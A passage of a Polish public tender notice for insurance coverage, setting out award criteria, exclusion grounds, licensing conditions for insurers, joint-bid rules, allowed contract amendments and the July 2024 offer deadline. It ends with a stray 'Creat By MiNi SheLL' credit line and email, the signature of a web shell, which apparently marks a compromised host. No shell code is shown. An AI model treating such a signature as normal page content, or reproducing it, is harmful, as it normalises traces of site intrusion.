10<br/>13. Klauzula transportowa	5</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzule fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualne zezwolenie na prowadzenie działalności ubezpieczeniowej na terenie Rzeczypospolitej Polskiej w grupach ryzyk, których dotyczy przedmiot zamówienia, <br/>o którym mowa w art. 7 ust. 1 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz. U. 2023, poz. 656 z późn.zm.) tj.<br/><br/>8	Ubezpieczenia szkód spowodowanych żywiołami, obejmujące szkody rzeczowe nieujęte w grupach 3-7, spowodowane przez: <br/>1)	ogień; <br/>2)	eksplozję; <br/>3)	burzę; <br/>4)	inne żywioły; <br/>5)	energię jądrową;<br/>6)	obsunięcia ziemi lub tąpnięcia.<br/>9	Ubezpieczenia pozostałych szkód rzeczowych (jeżeli nie zostały ujęte w grupie 3, 4, 5, 6 lub 7), wywołanych przez grad lub mróz oraz inne przyczyny (jak np. kradzież), jeżeli przyczyny te nie są ujęte w grupie 8.<br/>13	Ubezpieczenia odpowiedzialności cywilnej (ubezpieczenie odpowiedzialności cywilnej ogólnej) nieujętej w grupach 10-12.<br/><br/>lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów oświadczenie organu uprawnionego do reprezentowania Wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.6.1	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. <br/>o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej zgodnie treścią Załącznika nr 6 do niniejszej Specyfikacji.<br/>9.6.2	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, lub innego właściwego rejestru w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>9.6.3	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w pkt 9.1, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego t.j.: art. 108 ust. 1, art. 109 ust 1 pkt 8-10 ustawy PZP oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – zgodnie ze wzorem stanowiącym załącznik nr 14 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t. j. Dz. U. z 2023 r., poz. 656 z późn. zm.) w następującym zakresie: <br/><br/>8	Ubezpieczenia szkód spowodowanych żywiołami, obejmujące szkody rzeczowe nieujęte w grupach 3-7, spowodowane przez: <br/>7)	ogień; <br/>8)	eksplozję; <br/>9)	burzę; <br/>10)	inne żywioły; <br/>11)	energię jądrową;<br/>12)	obsunięcia ziemi lub tąpnięcia.<br/>9	Ubezpieczenia pozostałych szkód rzeczowych (jeżeli nie zostały ujęte <br/>w grupie 3, 4, 5, 6 lub 7), wywołanych przez grad lub mróz oraz inne przyczyny (jak np. kradzież), jeżeli przyczyny te nie są ujęte w grupie 8.<br/>13	Ubezpieczenia odpowiedzialności cywilnej (ubezpieczenie odpowiedzialności cywilnej ogólnej) nieujętej w grupach 10-12.<br/><br/>lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów oświadczenie organu uprawnionego do reprezentowania Wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 9.2.	W celu potwierdzenia, że oferowane usługi potwierdzają spełnianie wymagań określonych przez Zamawiającego w SWZ Wykonawca obowiązany będzie dostarczyć ogólne (szczególne) warunki wszystkich ubezpieczeń określone w przedmiocie zamówienia o udzielenie którego się ubiega – przedmiotowe środki dowodowe. (nie dotyczy ubezpieczeń obowiązkowych). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> ogólne (szczególne) warunki wszystkich ubezpieczeń określone w przedmiocie zamówienia o udzielenie którego się ubiega – przedmiotowe środki dowodowe. (nie dotyczy ubezpieczeń obowiązkowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.3.	Formularz ofertowy, którego wzór stanowi:<br/>9.3.1.	Załącznik nr 7 do niniejszej Specyfikacji <br/>9.4	Pełnomocnictwo/umocowanie prawne, w przypadku, gdy ofertę, składane dokumenty <br/>i oświadczenia podpisuje osoba nie widniejąca w dokumentach rejestrowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.1	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają<br/>i wskazują pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wzór pełnomocnictwa zawiera Załącznik nr 15 do SWZ.<br/>11.2	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z nich nie może podlegać wykluczeniu na podstawie przesłanek określonych w rozdziale 8 SWZ. Dodatkowo, każdy z Wykonawców musi posiadać uprawnienia do prowadzenia działalności ubezpieczeniowej, o której mowa w pkt 7.2.2. – Zamawiający dopuszcza możliwość, aby zakres tych uprawnień łącznie obejmował przedmiot zamówienia, na który zostanie złożona oferta przez tych Wykonawców.<br/>11.3	Zamawiający żąda od Wykonawców wspólnie ubiegających się o udzielenie zamówienia następujących dokumentów:<br/>11.3.1	oświadczenie o niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału <br/>w postępowaniu – składany indywidualnie przez każdego Wykonawcę wspólnie ubiegającego się <br/>o udzielenie zamówienia (Załącznik nr 4 do SWZ), oświadczenie należy złożyć razem z ofertą;<br/>11.3.2	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wg wzoru stanowiącego Załącznik nr 15 do SWZ, pełnomocnictwo należy złożyć razem z ofertą;<br/>11.3.3	podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia z postępowania, wymienione w pkt 9.6.1., 9.6.2. i 9.6.3, przy czym każdy Wykonawca składa odrębne dokumenty potwierdzające brak podstaw wykluczenia z postępowania, dokumenty należy złożyć na wezwanie;<br/>11.3.4	oświadczenie w trybie art. 117 ust. 4 ustawy PZP wg wzoru określonego w Załączniku nr 11 do SWZ <br/>w przypadku, gdy warunki udziału w postępowaniu spełniają tylko niektórzy spośród wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenie należy złożyć razem z ofertą;<br/>11.3.5	w przypadku polegania na zasobach podmiotów trzecich w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, którzy polegają na zasobach podmiotów trzecich składają dokumenty wymagane od Wykonawców występujących samodzielnie w postępowaniu, którzy korzystają z potencjału innego podmiotu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:<br/>1.1. zmiany o charakterze prawnym, tj.:<br/>1) zmiany powszechnie obowiązujących przepisów prawa, które będą miały wpływ na kształt warunków stanowiących podstawę udzielanej ochrony ubezpieczeniowej - w zakresie, w jakim zmiany te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia,<br/>2) zmiany przepisów o zamówieniach publicznych, jeśli Zamawiający będzie zobowiązany uwzględnić je w umowie zawartej przed taką zmianą,<br/>3) zmiany przepisów prawa międzynarodowego, które zobowiązana będzie wdrożyć Rzeczpospolita Polska, w tym organy jej administracji samorządowej,<br/>5) wydanie decyzji, uchwał, postanowień, rozstrzygnięć, orzeczeń, wyroków itp. przez uprawnione organy, które będą zobowiązywały Zamawiającego do zmiany zawartej umowy lub wynikających z niej umów ubezpieczenia,<br/>6) inne zmiany o charakterze prawnym, jeśli powstanie obowiązek ich wdrożenia, w zakresie w jakim zmiany te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia; <br/>1.2. zmiany zakresu zamówienia w przypadku zmiany podmiotów objętych zamówieniem, tj.:<br/>1) utworzenia przez Zamawiającego nowych podmiotów, w tym wyodrębnionych z podmiotów dotychczas objętych zamówieniem lub powstałych w wyniku ich połączenia,<br/>2) restrukturyzacji, przekształcenia, połączenia, podziału, komercjalizacji lub zmiany formy prawnej podmiotów objętych zamówieniem,<br/>3) rozwiązania podmiotu objętego zamówieniem;<br/>1.2.1. w przypadku zmiany formy prawnej podmiotów objętych zamówieniem, szczególnie w związku z ich przekształceniem w spółkę prawa handlowego, nowopowstały podmiot lub upoważniony przez niego Zamawiający winien wyrazić pisemnie wolę kontynuacji umów ubezpieczenia w ciągu 30 dni, a Wykonawca wyrazi zgodę na przeniesienie praw z umów na nowy podmiot, pod warunkiem, że nowy podmiot będzie posiadał analogiczny profil działalności, jak przed zmianą i nie ulegną zmianie zabezpieczenia przeciwpożarowe i przeciw kradzieżowe; w przypadku braku pisemnego potwierdzenia woli kontynuacji ubezpieczeń uważa się, że umowa ubezpieczenia wygasła z dniem zmiany formy prawnej, a Wykonawca dokona zwrotu składki za niewykorzystany okres ubezpieczenia zgodnie z przepisami Kodeksu cywilnego i zasadami rozliczenia określonymi w niniejszej umowie;<br/>1.3. zmiany przedmiotowego zakresu zamówienia, tj.:<br/>1)	wzrostu albo spadku ilości lub wartości przedmiotu ubezpieczenia ubezpieczonego systemem sum stałych (wzrostu albo spadku sumy ubezpieczenia), mylnym ujęciem lub pominięciem,<br/>2)	zwiększenia sumy ubezpieczenia w związku z modernizacją przedmiotu ubezpieczenia, przeprowadzonymi inwestycjami, adaptacją, rozbudową itp.,<br/>3)	zmiany wysokości sum ubezpieczenia, w tym wynikającej ze zobowiązań Zamawiającego zaciągniętych po zawarciu umowy,<br/>4)	zmiany wysokości sum gwarancyjnych, w tym wynikającej ze zobowiązań Zamawiającego zaciągniętych po zawarciu umowy,<br/>5)	zmiany wykonywanej działalności i konieczności objęcia zmiany tej ochroną ubezpieczeniową,<br/>6)	rozszerzenia zakresu ubezpieczenia w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego, nieprzewidzianego lub pominiętego w specyfikacji warunków zamówienia i konieczności zawarcia nowego rodzaju ubezpieczenia,<br/>7)	modyfikacji zakresu ochrony ubezpieczeniowej, w tym w związku ze zobowiązaniami Zamawiającego zaciągniętymi po zawarciu umowy,<br/>8)	wyczerpania sumy ubezpieczenia w ubezpieczeniu systemem pierwszego ryzyka lub limitów odszkodowawczych w klauzulach i innych warunkach umowy ubezpieczenia oraz wyczerpania sumy gwarancyjnej bądź podlimitów odszkodowawczych w ubezpieczeniu odpowiedzialności cywilnej i konieczności ich uzupełnienia;<br/>1.4. zmiany wynagrodzenia należnego Wykonawcy, jeśli zmiany opisane w pkt. 1.1-1.3 będą miały wpływ na wysokość tego wynagrodzenia: <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://platformazakupowa.pl/pn/aspergo do dnia 18.07.2024 r. do godz. 11:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9.7	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt 9.4.1, składa dokument lub dokumenty wystawione <br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>9.8	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 9.4.1, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>9.9	Wszystkie dokumenty sporządzone w języku obcym należy przedstawić wraz z ich tłumaczeniami na język polski.

Creat By MiNi SheLL
Email: jattceo@gmail.com